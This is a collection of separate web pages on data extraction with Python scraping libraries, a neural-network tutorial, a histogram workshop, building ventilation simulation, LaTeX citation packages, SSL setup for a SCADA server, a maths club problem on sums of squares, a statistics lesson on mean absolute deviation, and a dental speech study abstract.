In simple words, it is the collection of different types of data from multiple sources, most of which are unorganised or purely unstructured.
Data extraction is mainly about consolidating, processing and refining the unstructured data and storing it on a centralised location for further transformation. You may store it on-site, or on cloud based platforms or a hybrid of both.
Data Extraction and ETL: How does the process work?
Let us have a brief look at the ETL process for a better understanding. With the help of ETL, the companies can collect data from different sources and store them on a centralised location and assimilate various and differing data into a common and understandable format. Basically, the ETL process involves:
- Extraction: This process mainly deals with getting the data from various different sources. The extraction finds and locates relevant data and makes it suitable for further processing.
- Transformation: After extraction is complete, it is now time for refining the data. During this process, the data is organised and cleansed. The main elements in this process include erasing the duplicate entries, removing the missing values etc. At the end of the transformation phase, what we are left with is reliable, and usable data.
- Loading: Once the transformation of data is complete, the processed and high-quality data is loaded onto a centralised storage location for further use and analysis.
Many companies use data extraction for a number of reasons. It could be to streamline processes or support compliant efforts or so on.
Because now we are clear about what the process of data extraction is, let us have a look at what are the tools or methodologies available to extract the data.
Types of Data Extraction Tools
When it comes to extracting data, the two key decisions that data engineers have to take while designing the process are
What method to choose for extraction?
When it comes to selecting the extraction method, there are two options with the data engineers. They can go for either logical or physical modes of extraction. Under the logical extraction, there are further two ways – full extraction and incremental extraction.
Now, let us look at these extraction methods in brief.
Sometimes, there could be certain limitation with the source systems. Say for example, if you are trying to extract data from an outdated data storage unit, you will not be able to do it using logical extraction and you are left with only the physical way to do it. There are two types of physical extraction
Online extraction – where data is directly transferred from the source to the data warehouse by directly connecting the extraction tools to the source system or the transitional system.
Offline extraction – where there is no direct extraction and the process has to be carried out outside the source unit. In this process, the data in question is already organised.
There are two kinds of logical extraction:
Full extraction: Under this process, all the data is extracted from the source system at one go directly. Any need for extra information, be it logical or technological, does not arise. For example, if you are trying to export a file on price change, the system will extract the entire financial records of the organisation.
Incremental extraction: This process deals with the incremental or delta changes in the data. The extraction tool recognises new or altered information based on date and time. If you are using this method, you need to add complex extraction logic to the source systems first.
What are the two libraries you would need to scrape website data on Python?
To extract data from web pages, some of the Popular Python Libraries to Perform Web Scraping include
It is another versatile Python library that deals with HTML and XML files. It is relatively fast and easy to use.
How to install it?
We can use the pip command to install lxml.
(base) D:\ProgramData>pip install lxml Collecting lxml Downloading https://files.pythonhosted.org/packages/b9/55/bcc78c70e8ba30f51b5495eb0e 3e949aa06e4a2de55b3de53dc9fa9653fa/lxml-4.2.5-cp36-cp36m-win_amd64.whl (3. 6MB) 100% |¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦| 3.6MB 64kB/s Installing collected packages: lxml Successfully installed lxml-4.2.5
Beautiful Soup Library for Web Scraping
Let’s consider the case where you are looking to collect al the hyperlinks from any web page. In such cases, we can use Beautiful Soup Python library. It is mainly used to pull data out of HTML and XML files. You can use it with requests because it can’t fetch a web page on its own and needs an input to process.
How to install it?
We use the pip command to install beautiulsoup.
(base) D:\ProgramData>pip install bs4 Collecting bs4 Downloading https://files.pythonhosted.org/packages/10/ed/7e8b97591f6f456174139ec089c769f89 a94a1a4025fe967691de971f314/bs4-0.0.1.tar.gz Requirement already satisfied: beautifulsoup4 in d:\programdata\lib\sitepackages (from bs4) (4.6.0) Building wheels for collected packages: bs4 Running setup.py bdist_wheel for bs4 ... done Stored in directory: C:\Users\gaurav\AppData\Local\pip\Cache\wheels\a0\b0\b2\4f80b9456b87abedbc0bf2d 52235414c3467d8889be38dd472 Successfully built bs4 Installing collected packages: bs4 Successfully installed bs4-0.0.1
Extracting Data with EOV
EmbarkingOnVoyage has been a successfully leading the data extraction field, with an adept knowledge in multilingual text analytics. So, if you would like to know how we can help you in extraction of required data, please feel free to get in touch with us at email@example.com today!
Really great article | <urn:uuid:0744f2f2-d318-4ab1-a0f1-ef6fd0814d1f> | CC-MAIN-2023-14 | https://embarkingonvoyage.com/data-extraction-using-python-libraries/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944606.5/warc/CC-MAIN-20230323003026-20230323033026-00015.warc.gz | en | 0.888666 | 1,538 | 3.15625 | 3 |
This is part 5 of a series of tutorials, in which we develop the mathematical and algorithmic underpinnings of deep neural networks from scratch and implement our own neural network library in Python, mimicing the TensorFlow API. Start with the first part: I: Computational Graphs.
- Part I: Computational Graphs
- Part II: Perceptrons
- Part III: Training criterion
- Part IV: Gradient Descent and Backpropagation
- Part V: Multi-Layer Perceptrons
- Part VI: TensorFlow
Many real-world classes that we encounter in machine learning are not linearly separable. This means that there does not exist any line with all the points of the first class on one side of the line and all the points of the other class on the other side. Let’s illustrate this with an example.
As we can see, it is impossible to draw a line that separates the blue points from the red points. Instead, our decision boundary has to have a rather complex shape. This is where multi-layer perceptrons come into play: They allow us to train a decision boundary of a more complex shape than a straight line.
As their name suggests, multi-layer perceptrons (MLPs) are composed of multiple perceptrons stacked one after the other in a layer-wise fashion. Let’s look at a visualization of the computational graph:
As we can see, the input is fed into the first layer, which is a multidimensional perceptron with a weight matrix $W_1$ and bias vector $b_1$. The output of that layer is then fed into second layer, which is again a perceptron with another weight matrix $W_2$ and bias vector $b_2$. This process continues for every of the $L$ layers until we reach the output layer. We refer to the last layer as the output layer and to every other layer as a hidden layer.
an MLP with one hidden layers computes the function
$$\sigma(\sigma(X \, W_1 + b_1) W_2 + b_2) \,,$$
an MLP with two hidden layers computes the function
$$\sigma(\sigma(\sigma(X \, W_1 + b_1) W_2 + b_2) \, W_3 \,,$$
and, generally, an MLP with $L-1$ hidden layers computes the function
$$\sigma(\sigma( \cdots \sigma(\sigma(X \, W_1 + b_1) W_2 + b_2) \cdots) \, W_L + b_L) \,.$$
Using the library we have built, we can now easily implement multi-layer perceptrons without further work.
As we can see, we have learned a rather complex decision boundary. If we use more layers, the decision boundary can become arbitrarily complex, allowing us to learn classification patterns that are impossible to spot by a human being, especially in higher dimensions.
Congratulations on making it this far! You have learned the foundations of building neural networks from scratch, and in contrast to most machine learning practitioners, you now know how it all works under the hood and why it is done the way it is done.
Let’s recap what we have learned. We started out by considering computational graphs in general, and we saw how to build them and how to compute their output. We then moved on to describe perceptrons, which are linear classifiers that assign a probability to each output class by squashing the output of $w^Tx+b$ through a sigmoid (or softmax, in the case of multiple classes). Following that, we saw how to judge how good a classifier is – via a loss function, the cross-entropy loss, the minimization of which is equivalent to maximum likelihood. In the next step, we saw how to minimize the loss via gradient descent: By iteratively stepping into the direction of the negative gradient. We then introduced backpropagation as a means of computing the derivative of the loss with respect to each node by performing a breadth-first search and multiplying according to the chain rule. We used all that we’ve learned to train a good linear classifier for the red/blue example dataset. Finally, we learned about multi-layer perceptrons as a means of learning non-linear decision boundaries, implemented an MLP with one hidden layer and successfully trained it on a non-linearly-separable dataset.
The upcoming sections will be focused on providing hands-on experience in neural network training. Continue with the next part: VI: TensorFlow
modded your code abit to allow me to input my own data with clicks
middle click-start optimization
Great, thanks. Could you please modify the code to point to the original blog post, rather than to the about-me page?
Thanks for the great resource! I’m learning a lot from it 🙂
Sorry if I’m mistaken, but is there a chance that the code for generating the red and blue points is accidentally the same as the single-layer perceptron?
It seems to me that the code
# Create red points centered at (-2, -2)
red_points = np.random.randn(50, 2) – 2*np.ones((50, 2))
# Create blue points centered at (2, 2)
blue_points = np.random.randn(50, 2) + 2*np.ones((50, 2))
Produces a linearly separable set of points, and doesn’t resemble your plot.
Indeed, this code produce something like that: https://uploads.disquscdn.com/images/765c4fc3860256fcd2bfd8af7a509c19a8e420ede28ca92753aaba231b738b82.png
Replace it with this:
# Create two clusters of red points centered at (0, 0) and (1, 1), respectively.
red_points = np.concatenate((
0.2*np.random.randn(25, 2) + np.array([[0, 0]]*25),
0.2*np.random.randn(25, 2) + np.array([[1, 1]]*25)
# Create two clusters of blue points centered at (0, 1) and (1, 0), respectively.
blue_points = np.concatenate((
0.2*np.random.randn(25, 2) + np.array([[0, 1]]*25),
0.2*np.random.randn(25, 2) + np.array([[1, 0]]*25)
You’re right! I accidentally embedded the wrong code cell. It is now fixed.
The series of posts are really good and I am going through them trying to absorb and implement as much as possible.
One question about the multi-layer perceptron. Here we are only considering one perceptron per layer, is that right? | <urn:uuid:4aa86aff-6db8-4075-81b9-3a92dd40c9da> | CC-MAIN-2023-14 | https://www.sabinasz.net/deep-learning-from-scratch-v-multi-layer-perceptrons/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945368.6/warc/CC-MAIN-20230325161021-20230325191021-00015.warc.gz | en | 0.877926 | 1,591 | 3.15625 | 3 |
Histograms and Inverting Skewed Data
Welcome! This workshop is from Winder.ai. Sign up to receive more free workshops, training and videos.
When we first receive some data, it can be in a mess. If we tried to force that data into a model it is more than likely that the results will be useless.
So we need to spend a significant amount of time cleaning the data. This workshop is all about bad data.
# These are the standard imports that we will use all the time. import os # Library to do things on the filesystem import pandas as pd # Super cool general purpose data handling library import matplotlib.pyplot as plt # Standard plotting library import numpy as np # General purpose math library from IPython.display import display # A notebook function to display more complex data (like tables) import scipy.stats as stats # Scipy again
Dummy data investigation
For this part of the workshop we’re going to create some “dummy” data. Dummy data is great for messing around with new tools and technologies. And they serve as reference datasets for people to compete against.
However, as you will see, dummy data is never as complex as the real world…
# Generate some data np.random.seed(42) # To ensure we get the same data every time. X = (np.random.randn(100,1) * 5 + 10)**2 print(X[:10])
[[ 155.83953905] [ 86.65149531] [ 175.25636487] [ 310.29348423] [ 77.9553576 ] [ 77.95680717] [ 320.26910947] [ 191.4673745 ] [ 58.56271638] [ 161.61528938]]
Let’s print the mean and standard deviation of this data.
# Print the mean and standard deviation print("Raw: %0.3f +/- %0.3f" % (np.mean(X), np.std(X)))
Raw: 110.298 +/- 86.573
This is telling us that we should expect to see approximately two thirds of the values to occur in the range 110 +/- 87. However, this data is not quite as it seems.
A histogram is one of the most basic but useful plots you can use to visualise the data contained within a feature.
If we imagine a range of bins, in this example let’s imagine bins that are 25 wide and extend from zero up to 350 ish. What we can do is count the number of times that we see an observation falling within each bin. This is known as a Histogram (often we also perform some scaling to the raw counts, but we’ll ignore that for now).
Let’s plot the histogram of the above data to see what’s going on.
df = pd.DataFrame(X) # Create a pandas DataFrame out of the numpy array df.plot.hist(alpha=0.5, bins=15, grid=True, legend=None) # Pandas helper function to plot a hist. Uses matplotlib under the hood. plt.xlabel("Feature value") plt.title("Histogram") plt.show()
We can see that the data appears pretty noisy. And it’s strangly skewed.
With experience, you would notice that all the data are positive, this is strange. You would also notice that there appears to be a downward-curved slope from a feature value of 0 to 350.
This is indicating some sort of power law, or exponential.
We can transform the data, by trying to invert the mathematical operation that has occured up to the point where we measured it. This is ok, we’re not altering the data, we’re just changing how it is represented.
df_exp = df.apply(np.log) # pd.DataFrame.apply accepts a function to apply to each column of the data df_exp.plot.hist(alpha=0.5, bins=15, grid=True, legend=None) plt.xlabel("Feature value") plt.title("Histogram") plt.show()
Ok, that still looks a bit weird. I wonder if it’s a power law?
df_pow = df.apply(np.sqrt) df_pow.plot.hist(alpha=0.5, bins=15, grid=True, legend=None) plt.xlabel("Feature value") plt.title("Histogram") plt.show()
That’s looking much better! So it looks like it is a power law (to the power of 2). But to be sure, let’s fit a normal curve over the top…
param = stats.norm.fit(df_pow) # Fit a normal distribution to the data x = np.linspace(0, 20, 100) # Linear spacing of 100 elements between 0 and 20. pdf_fitted = stats.norm.pdf(x, *param) # Use the fitted paramters to create the y datapoints # Plot the histogram again df_pow.plot.hist(alpha=0.5, bins=15, grid=True, normed=True, legend=None) # Plot some fancy text to show us what the paramters of the distribution are (mean and standard deviation) plt.text(x=np.min(df_pow), y=0.1, s=r"$\mu=%0.1f$" % param + "\n" + r"$\sigma=%0.1f$" % param, color='r') # Plot a line of the fitted distribution over the top plt.plot(x, pdf_fitted, color='r') # Standard plot stuff plt.xlabel("Feature value") plt.title("Histogram with fitted normal distribution") plt.show()
Yeah, definitely looking pretty good. Always try to visualise your data to make sure it conforms to your expectations
Remember that some algorithms don’t like data that isn’t centred around 0 and they don’t like it when the standard deviation isn’t 1.
So we transform the data by scaling with the
from sklearn import preprocessing X_s = preprocessing.StandardScaler().fit_transform(df_pow) X_s = pd.DataFrame(X_s) # Put the np array back into a pandas DataFrame for later print("StandardScaler: %0.3f +/- %0.3f" % (np.mean(X_s), np.std(X_s))) # Nice! This should be 0.000 +/- 1.000
StandardScaler: -0.000 +/- 1.000
param = stats.norm.fit(X_s) x = np.linspace(-3, 3, 100) pdf_fitted = stats.norm.pdf(x, *param) X_s.plot.hist(alpha=0.5, bins=15, grid=True, normed=True, legend=None) plt.text(x=np.min(df_pow), y=0.1, s=r"$\mu=%0.1f$" % param + "\n" + r"$\sigma=%0.1f$" % param, color='r') plt.xlabel("Feature value") plt.title("Histogram with fitted normal distribution") plt.plot(x, pdf_fitted, color='r') plt.show() | <urn:uuid:baf4bdd4-c4f5-43a9-9f01-deba6c732402> | CC-MAIN-2023-14 | https://winder.ai/histograms-and-skewed-data/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943746.73/warc/CC-MAIN-20230321193811-20230321223811-00215.warc.gz | en | 0.774849 | 1,687 | 2.515625 | 3 |
1. Why ?
In Building Energy Simulation (BES) softwares, pressure coefficients are generally given by correlations according to the angle of incidence and the shape of the building [Swami & Chandra 1988] or tabulated values that are unsuitable for most real-life situations: for example, Figure 1 below shows the values used by some BES softwares to determine the pressure coefficients C_p .
The calculated natural ventilation flows are therefore very likely to be incorrect if they are estimated from the default values (see also our article on reducing uncertainties in natural ventilation).
First, the pressure coefficients per façade element must be computed, depending on the wind orientation and magnitude (an illustration of the pressure field on a building is given in Figure 2).
Each pressure coefficient must then be assigned to the correct façade element. To achieve this, we go through the file defining the BES problem (" *.idf " file in EnergyPlus) and replace the pressure coefficient for each opening and each wall, in order to calculate the flow rates related to infiltrations.
This technique has two main advantages:
- Compared to a direct use of the flowrates computed with CFD, this preserves the thermal buoyancy effects related to the temperature difference between inside and outside.
- The number of pressure coefficients per wind direction is increased: by default they are given every 45 degrees, while we take a maximum of 30 degrees.
The question is then: how many wind directions should we simulation for a better prediction of wind-induced natural ventilation? Next section gives an insight about this topic.
3. Influence of angular discretization
Figure 4 below shows the natural ventilation rate in a largely glazed train station atrium. The different lines plotted correspond to an increasing number of wind directions simulated: for instance "4 directions" means one simulation is done every 90° and "24 directions" means one simulation every 15°.
One can see that from 8 directions (id est \Delta\theta=45°), the differences tend to decrease. The error gap between 12 and 24 simulations is relatively low, which in the presented context would advocate for only 12 CFD simulations. A more thorough quantitative analysis is available at Techniques de l'Ingénieur website. | <urn:uuid:063eb015-1a01-45ca-b2df-59726f596d80> | CC-MAIN-2023-14 | https://app-nabla-arep.azurewebsites.net/en/simulation-thermique/couplages/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950110.72/warc/CC-MAIN-20230401160259-20230401190259-00615.warc.gz | en | 0.896605 | 467 | 3.1875 | 3 |
The Mouse's Tale in LaTeX
This example from section three of the LaTeX verse package documentation demonstrates an ambitious use of \indentpattern to create a striking visual effect. In this case it is defined to recreate the famous typesetting of the original Mouse's Tale as it appeared in print.
Background: "The Mouse's Tale" is a poem by Lewis Carroll involving a 'quadruple pun' which appears in his novel Alice's Adventures in Wonderland. It uses typesetting style to create the final pun (it is a mouse's tale typeset in the shape of a mouse's tail).
For more details see the poem's Wikipedia entry.
The Chicago Citation Style with biblatex
The biblatex-chicago package implements the citation style of the Chicago Manual of Style, 16th edition. In this example, the notes option causes biblatex's autocite command to put citations in footnotes. The package can also produce inline author-year citations in the Chicago style. See the package documentation for more information.
Bibliographies with biber and biblatex
This example shows how to automatically generate citations and a bibliography with biblatex and biber.
Biblatex and biber work together to automatically format references and citations like the older cite or natbib and bibtex tool chain, but they offer more powerful and easier to use formatting and better support for special characters (unicode).
For a full list of biblatex styles, see the user guide in the biblatex manual.
LaTeX Bibliography Example: The natbib Package
The natbib package provides automatic numbering, sorting and formatting of in text citations and bibliographic references in LaTeX. It supports both numeric and author-year citation styles.
The natbib package is the most commonly used package for handling references in LaTeX, and it is very functional, but the more modern biblatex package is also worth a look. | <urn:uuid:ffd987e8-7eb5-441c-bc99-5891f786ff65> | CC-MAIN-2023-14 | https://ja.overleaf.com/latex/examples/tagged/citations | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945292.83/warc/CC-MAIN-20230325002113-20230325032113-00015.warc.gz | en | 0.809383 | 428 | 2.53125 | 3 |
The IIS server where a Merbon SCADA server is installed should contain a SSL security certificate. Otherwise most of the browsers will consider the site insecure and show warning messages, or refuse to display the web pages completely.
HTTPS/SSL protocol can secure the data travelling between client and server and back. This means that the data flow between the browser and the server can not be monitored by a third party. Standard TCP port for HTTPS/SSL communication is 443, while HTTP standard port is 80.
The addresses of web pages secured with SSL start with the https:// protocol name. The browsers display a padlock icon in the address row, and tinge the address with different colours: green for full compliance, yellow or orange for a secured page with problems (such as containing a valid certificate issued for another domain), and red for a wrong certificate. If the certificate has been created using OpenSSL or IIS (self-signed certificate) the browser may show a message that the web is not trustworthy when accessed over the Internet. This problem can be solved by a certificate issued by an external authority.
Issuing a certificate by an external authority is a paid service (about 10 to 50 € per year). The price depends on the trustworthiness of the issuing authority, validity length of the certificate, degree of security, etc. The certificates must be prolonged as their validity is limited by time. The expiration date is stored directly in the certificate, and can be viewed e.g. in a web browser. As soon as the certificate expires, it is automatically considered invalid. Maximum validity length is usually 2 years. This means that even if the server is certified at the installation time, it loses its validity after maximum two years of operation, and SCADA „stops working“ just by itself. This is long before the warranty time ends (which may be up to 5 years at the turnkey projects).
If the Merbon SCADA server is operated exclusively in an intranet, i.e. without access from the Internet, using SSL is not necessary and browsers tend to accept unencrypted connection too (http://, TCP port 80). Then the standard installation manual for Merbon SCADA server setup is to be followed.
If the Merbon SCADA server shall be accessible from the Internet, the IIS server should have a SSL certificate installed. The certificate is issued by a certification authority. It is bound to the domain name which is used to access the server, for example merbonscada.company.com. This name has to be agreed with the IT manager of the network the server is installed in. The IT must also configure the network so that the server is available from the Internet.
A certificate is a file with .pfx extension. There are also other certificate formats, however, the IIS server requires a .pfx file. The file is imported in the IIS server settings (Server certificates) and then selected in the MerbonScada_Web configuration (Bindings, Add…, Type: https to port 443, and select the certificate file which was imported in the previous step).
As a certificate is subject to expiration, it must be updated regularly. At system (turnkey) project supplied by Domat, Domat as a supplier guarantees a valid certificate for a period of 2 years or until end of the warranty time according to the contract. Then a new certificate must be either ordered extra as a post-warranty service, or got by the site owner or operator.
If the Merbon SCADA licence is supplied as a product, the system integrator or IT department of the IIS server owner are fully responsible for issuing of a certificate, its installation and configuration of the IIS server. All system integrators are asked to get to know the SSL problematics and the Merbon SCADA Server environment thoroughly before the commissioning starts. It is advised to organize the connection to the Internet, domain name and issuing of a certificate in advance. It saves time spent on commissioning. Please note that the IIS server configuration takes about 30 minutes plus time required for communication with the local IT and a certification authority.
In general, for the issuing of the certificate, its installation and updates, the IIS server operator is responsible rather than the SCADA system supplier.
Open the IIS manager (v C:\Windows\System32\inetsrv the InetMgr.exe file)
Select the server and click Server certificates: Select Actions – Import:
Select the certificate file and enter the import password provided by the issuing authority. Click OK. The certificate is now imported in the server.
In the IIS settings select the Merbon SCADA web and in the properties go to Edit web, Bindings… Add a https binding and select the imported certificate. Confirm by OK and restart the web. The web is now certified. | <urn:uuid:5c61dc01-ed57-4f47-9aa6-7c3df7ac676a> | CC-MAIN-2023-14 | https://www.domat-int.com/en/ssl-security-certificate-for-merbon-scada-servers | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948932.75/warc/CC-MAIN-20230329023546-20230329053546-00215.warc.gz | en | 0.915226 | 996 | 2.515625 | 3 |
Season 3 Episode 1
Dr Vicky Neale joins the stream for epsiode 1 with a problem for us; which numbers can be written as the sum of two squares?
Sums of two squares
The main question from the livestream was;
Which numbers can be written as the sum of two squares?
Here are some of the conjectures you made in the livestream;
- A square is a sum of two squares
- Numbers that are a square plus 1, 4, 9, … are sums of two squares
- Powers of 2 (or 5) are sums of two squares.
- The largest number in a Pythagorean triple is a sum of two squares in $\geq 2$ ways.
- If n is a sum of two squares then so is 2n
- A number 3, 6, or 7 (mod 8) is not a sum of two squares
- If n, m are sums of two squares then so is nm.
Can you make any more conjectures of your own? Can you prove (or disprove!) them?
If you like this, you might also like to try adding other numbers of squares (for example, what numbers can you make by adding three squares?). Some versions of this question are easy (which numbers can you make by adding one square) and some are hard – it’s sometimes difficult to guess which is which.
Someone asked if we’re going to publish this research. Unfortunately, other mathematicians who came before us have worked out answers to these problems already. Do not look at these until you’ve had all the fun that you can have exploring – once you’ve seen the full answer, you can’t unsee it! Exploring places that have already been explored before is still fun, like climbing a mountain rather than taking the ski-lift. You learn a lot more about climbing if you don’t take the ski lift, even if you don’t make it all the way to the top.
Answers (don’t look at these)
Complex numbers, primes, and residues
For more complex numbers and primes, see Season 2 episode 3 with Ittihad.
For more on quadratic residues (the remainders that you can get by dividing square numbers by a particular number), see Season 1 episode 0 with James.
Complex numbers, quaternions, and more
When complex numbers came up, someone in chat mentioned more the obscure quaternions and octonions. These are “higher dimensional” versions of complex numbers, which you might be interested in (but you certainly won’t learn about these in A-level or equivalent!)
- More on complex numbers; An Introduction to Complex Numbers
- Quaternions; Curious quaternions
- Octonions; Ubiquitous octonions
More Vicky Neale
Vicky has two books that you might be interested in if you liked this episode;
- Closing the gap is the story of cutting-edge research in prime number theory, with plenty of things for you to investigate yourself along the way.
- Why study Mathematics? has lots more information about what mathematics is like at university and why you should consider studying it.
Vicky has previously appeared on the OOMC in Season 2 episode 0 with a different problem involving squares.
For a six-week maths summer school with Vicky (and other people!), see PROMYS.
The application is free, and you might find the application problems fun, even if you’re not going to apply.
For a summer school with James (and other people!) and lots of online support between April and December with your university applications (especially Oxford), see UNIQ.
This course is a free programme for UK state-school students, and we prioritise students with good grades from backgrounds that are under-represented at Oxford.
If you want to get in touch with us about any of the mathematics in the video or the further reading, feel free to email us on oomc [at] maths.ox.ac.uk. | <urn:uuid:88e10137-fff3-4ef5-bd72-a9ae1fdf5925> | CC-MAIN-2023-14 | https://www.maths.ox.ac.uk/outreach/oxford-online-maths-club/season-3-episode-1 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945317.85/warc/CC-MAIN-20230325064253-20230325094253-00415.warc.gz | en | 0.950353 | 867 | 2.75 | 3 |
Labels Used in Algebra
\[\pi\]is a very special number, special enough to have a symbol to label it.
Less special numbers have letters to label them. Unknown numbers are labelled
\[y\], as are coordinate axes, though other symbols can be used.
Integers are generally labelled
\[n\](the 'natural numbers' are the positive integers) and
Lengths can be labelled by lots of different letter:
\[a, \: b, \: c\]are used for triangles,
\[a, \: b, \: h\]are used for trapeziums, and
\[r\]is used for the radius of a circle.
\[l\]is used to label the length of an arc - part of the perimeter - of a circle, and
\[s\]is used to lbel the slant height of a cone. | <urn:uuid:3f492204-6578-4ee0-ad2c-768b43872793> | CC-MAIN-2023-14 | https://astarmathsandphysics.com/gcse-maths-notes/4612-labels-used-in-algebra.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943483.86/warc/CC-MAIN-20230320114206-20230320144206-00216.warc.gz | en | 0.806312 | 211 | 3.765625 | 4 |
Variability and MAD
5.1: Shooting Hoops (Part 1)
Elena, Jada, and Lin enjoy playing basketball during recess. Lately, they have been practicing free throws. They record the number of baskets they make out of 10 attempts. Here are their data sets for 12 school days.
- Calculate the mean number of baskets each player made, and compare the means. What do you notice?
- What do the means tell us in this context?
5.2: Shooting Hoops (Part 3)
The tables show Elena, Jada, and Lin’s basketball data from an earlier activity. Recall that the mean of Elena’s data, as well as that of Jada and Lin’s data, was 5.
- Record the distance between each of Elena’s scores and the mean.
Elena 4 5 1 6 9 7 2 8 3 3 5 7 distance from 5 1 1
Now find the average of the distances in the table. Show your reasoning and round your answer to the nearest tenth.
This value is the mean absolute deviation (MAD) of Elena’s data.
Elena’s MAD: _________
- Find the mean absolute deviation of Jada’s data. Round it to the nearest tenth.
Jada 2 4 5 4 6 6 4 7 3 4 8 7 distance from 5
Jada’s MAD: _________
- Find the mean absolute deviation of Lin’s data. Round it to the nearest tenth.
Lin 3 6 6 4 5 5 3 5 4 6 6 7 distance from 5
Lin’s MAD: _________
Compare the MADs and dot plots of the three students’ data. Do you see a relationship between each student’s MAD and the distribution on her dot plot? Explain your reasoning.
Invent another data set that also has a mean of 5 but has a MAD greater than 2. Remember, the values in the data set must be whole numbers from 0 to 10.
5.3: Which Player Would You Choose?
Andre and Noah joined Elena, Jada, and Lin in recording their basketball scores. They all recorded their scores in the same way: the number of baskets made out of 10 attempts. Each collected 12 data points.
- Andre’s mean number of baskets was 5.25, and his MAD was 2.6.
- Noah’s mean number of baskets was also 5.25, but his MAD was 1.
Here are two dot plots that represent the two data sets. The triangle indicates the location of the mean.
- Without calculating, decide which dot plot represents Andre’s data and which represents Noah’s. Explain how you know.
- If you were the captain of a basketball team and could use one more player on your team, would you choose Andre or Noah? Explain your reasoning.
- An eighth-grade student decided to join Andre and Noah and kept track of his scores. His data set is shown here. The mean number of baskets he made is 6.
eighth‐grade student 6 5 4 7 6 5 7 8 5 6 5 8 distance from 6
- Calculate the MAD. Show your reasoning.
- Draw a dot plot to represent his data and mark the location of the mean with a triangle (\(\Delta\)).
- Compare the eighth-grade student’s mean and MAD to Noah’s mean and MAD. What do you notice?
- Compare their dot plots. What do you notice about the distributions?
- What can you say about the two players’ shooting accuracy and consistency?
Invent a data set with a mean of 7 and a MAD of 1.
5.4: Swimmers Over the Years
In 1984, the mean age of swimmers on the U.S. women’s swimming team was 18.2 years and the MAD was 2.2 years. In 2016, the mean age of the swimmers was 22.8 years, and the MAD was 3 years.
- How has the average age of the women on the U.S. swimming team changed from 1984 to 2016? Explain your reasoning.
- Are the swimmers on the 1984 team closer in age to one another than the swimmers on the 2016 team are to one another? Explain your reasoning.
Here are dot plots showing the ages of the women on the U.S. swimming team in 1984 and in 2016. Use them to make two other comments about how the women’s swimming team has changed over the years.
We use the mean of a data set as a measure of center of its distribution, but two data sets with the same mean could have very different distributions.
This dot plot shows the weights, in grams, of 22 cookies.
The mean weight is 21 grams. All the weights are within 3 grams of the mean, and most of them are even closer. These cookies are all fairly close in weight.
This dot plot shows the weights, in grams, of a different set of 30 cookies.
The mean weight for this set of cookies is also 21 grams, but some cookies are half that weight and others are one-and-a-half times that weight. There is a lot more variability in the weight.
There is a number we can use to describe how far away, or how spread out, data points generally are from the mean. This measure of spread is called the mean absolute deviation (MAD).
Here the MAD tells us how far cookie weights typically are from 21 grams. To find the MAD, we find the distance between each data value and the mean, and then calculate the mean of those distances.
For instance, the point that represents 18 grams is 3 units away from the mean of 21 grams. We can find the distance between each point and the mean of 21 grams and organize the distances into a table, as shown.
|weight in grams||18||19||19||19||20||20||20||20||21||21||21||21||21||22||22||22||22||22||22||23||23||24|
|distance from mean||3||2||2||2||1||1||1||1||0||0||0||0||0||1||1||1||1||1||1||2||2||3|
The values in the first row of the table are the cookie weights for the first set of cookies. Their mean, 21 grams, is the mean of the cookie weights.
The values in the second row of the table are the distances between the values in the first row and 21. The mean of these distances is the MAD of the cookie weights.
What can we learn from the averages of these distances once they are calculated?
- In the first set of cookies, the distances are all between 0 and 3. The MAD is 1.2 grams, which tells us that the cookie weights are typically within 1.2 grams of 21 grams. We could say that a typical cookie weighs between 19.8 and 22.2 grams.
In the second set of cookies, the distances are all between 0 and 13. The MAD is 5.6 grams, which tells us that the cookie weights are typically within 5.6 grams of 21 grams. We could say a typical cookie weighs between 15.4 and 26.6 grams.
The MAD is also called a measure of the variability of the distribution. In these examples, it is easy to see that a higher MAD suggests a distribution that is more spread out, showing more variability.
The average is another name for the mean of a data set.
For the data set 3, 5, 6, 8, 11, 12, the average is 7.5.
\(45 \div 6 = 7.5\)
The mean is one way to measure the center of a data set. We can think of it as a balance point. For example, for the data set 7, 9, 12, 13, 14, the mean is 11.
To find the mean, add up all the numbers in the data set. Then, divide by how many numbers there are. \(7+9+12+13+14=55\) and \(55 \div 5 = 11\).
- mean absolute deviation (MAD)
The mean absolute deviation is one way to measure how spread out a data set is. Sometimes we call this the MAD. For example, for the data set 7, 9, 12, 13, 14, the MAD is 2.4. This tells us that these travel times are typically 2.4 minutes away from the mean, which is 11.
To find the MAD, add up the distance between each data point and the mean. Then, divide by how many numbers there are.
\(4+2+1+2+3=12\) and \(12 \div 5 = 2.4\)
- measure of center
A measure of center is a value that seems typical for a data distribution.
Mean and median are both measures of center. | <urn:uuid:5b376139-857e-4726-a25a-b330eeb1202b> | CC-MAIN-2023-14 | https://im.kendallhunt.com/MS_ACC/students/1/8/5/index.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943746.73/warc/CC-MAIN-20230321193811-20230321223811-00216.warc.gz | en | 0.947596 | 2,020 | 3.859375 | 4 |
Turkish Journal of Medical Sciences
The effect of early loss of anterior primary tooth on speech production in preschool children
Early childhood caries (ECC) is a progressive dental caries in children that may cause premature loss of the anterior primary teeth. In this study, the aim was to investigate the effects of primary anterior tooth loss and removable dentures on the speech of children with ECC. Materials and methods: Included in the study were 15 patients with ECC who required extraction of the primary anterior teeth and needed dentures (case group), and 15 healthy children (control group). The articulation of the control group was evaluated once and that of the case group was evaluated before and after extraction, before and after dentures, and at the follow-up exam. The errors of both groups and those among the case group for 5 periods were compared statistically. Results: It was found that tooth loss did not influence articulation. However, dentures temporarily effected articulation of the [s], [\int], and [z] speech sounds. Conclusion: It was concluded that although dentures may cause articulation disorders, children have an ability to compensate for the differences and articulate speech sounds correctly.
Early childhood caries, articulation disorders, speech
TURGUT, MELEK DİLEK; GENÇ, GÜLSÜM AYDAN; BAŞAR, FİGEN; and TEKÇİÇEK, MERYEM UZAMIŞ
